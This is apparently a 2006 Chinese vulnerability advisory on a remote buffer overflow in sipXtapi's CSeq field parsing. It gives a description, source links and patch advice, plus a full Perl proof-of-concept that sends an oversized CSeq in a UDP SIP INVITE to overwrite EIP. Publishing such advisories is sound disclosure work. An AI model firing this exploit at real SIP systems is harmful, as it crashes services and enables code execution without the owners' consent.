⊙ 在线帮助
⊙ 添加收藏
⊙ 网站地图
最新资讯
技术中心
下载园地
漏洞总汇
在线书籍
X-档案
法规标准
技术论坛
 您现在的位置 >> 首页 >> 漏洞总汇 >> 程序脚本 >> sdk
 
 
SIPfoundry SIPXtapi CSeq处理远程溢出漏洞

【责 编】:AcOol
【作 者】:不详
【添 加】:2006-7-11
【更 新】:2006-7-11
【出 处】:绿盟科技
【字 体】:[   ]
【浏 览】:
受影响系统: 
SIP Foundry SipXtapi
描述:
BUGTRAQ  ID: 18906

sipXtapi是一个简单易用的软件开发工具包(SDK),用于开发各种单机或集成的SIP客户端。

sipXtapi库在解析CSeq字段时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。

远程攻击者可以通过发送大于24个字节的CSeq字段触发这个漏洞,导致控制EIP,执行任意代码。

<*来源:Michael Thumann (mthumann@ernw.de
  
  链接:http://secunia.com/advisories/20997/print/
        http://marc.theaimsgroup.com/?l=bugtraq&m=115255370208995&w=2
*>
测试:
#!/usr/bin/perl
# PoC Exploit By mthumann@ernw.de
# Remote Buffer Overflow in sipXtapi

use IO::Socket;
#use strict;


print "sipXtapi Exploit by Michael Thumann \n\n";

if (not $ARGV[0]) {
        print "Usage: sipx.pl <host>\n";
exit;}

$target=$ARGV[0];
my $source ="127.0.0.1";
my $target_port = 5060;
my $user ="bad";
my $eip="\x41\x41\x41\x41";
my $cseq =
"\x31\x31\x35\x37\x39\x32\x30\x38".
"\x39\x32\x33\x37\x33\x31\x36\x31".
"\x39\x35\x34\x32\x33\x35\x37\x30".
$eip;
my $packet =<<END;
INVITE sip:user\@$source SIP/2.0\r
To: <sip:$target:$target_port>\r
Via: SIP/2.0/UDP $target:3277\r
From: "moz"<sip:$target:3277>\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: <sip:$source:5059>\r
\r
END

print "Sending Packet to: " . $target . "\n\n";
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);
send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n";
print "Done.\n";
建议:
厂商补丁:

SIP Foundry
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.sipfoundry.org/index.html
·本站特别声明不要转载或作者授权本站独家播发的文章,请勿转载。
·本站原创文章可自由转载,但本站作者及本站链接必须保留。
·非本站原创文章可自由转载,请按作者及文章出处一节,自行链接。
·转载之图片、文件,链接请不要盗链到本站,且不准打上各自站点的水印,亦不能抹去我站点水印。

+ 本站推荐 +
·SIPfoundry SIPXtapi CSeq处理
·PPPD Winbind插件本地权限提升
·Microsoft IE StructuredGraph
·WordPress错误paged参数SQL操作
·Microsoft Windows explorer.e
+ 相关漏洞 +
+ 热点漏洞 +
·Microsoft Windows Media Play
·Microsoft IE JavaScript OnLo
·RARLAB WinRAR命令行处理溢出漏
·动网论坛(DVBBS 7.1.0 SP1)Sav
·McAfee VirusScan路径指定权限
+ 本站发布 +
 
 
关于站点 | 免责申明 | 版权隐私 | 业务合作 | 提供捐助 | 联系我们 Copyright © 2001-2005 CoolerSky. All Rights Reserved.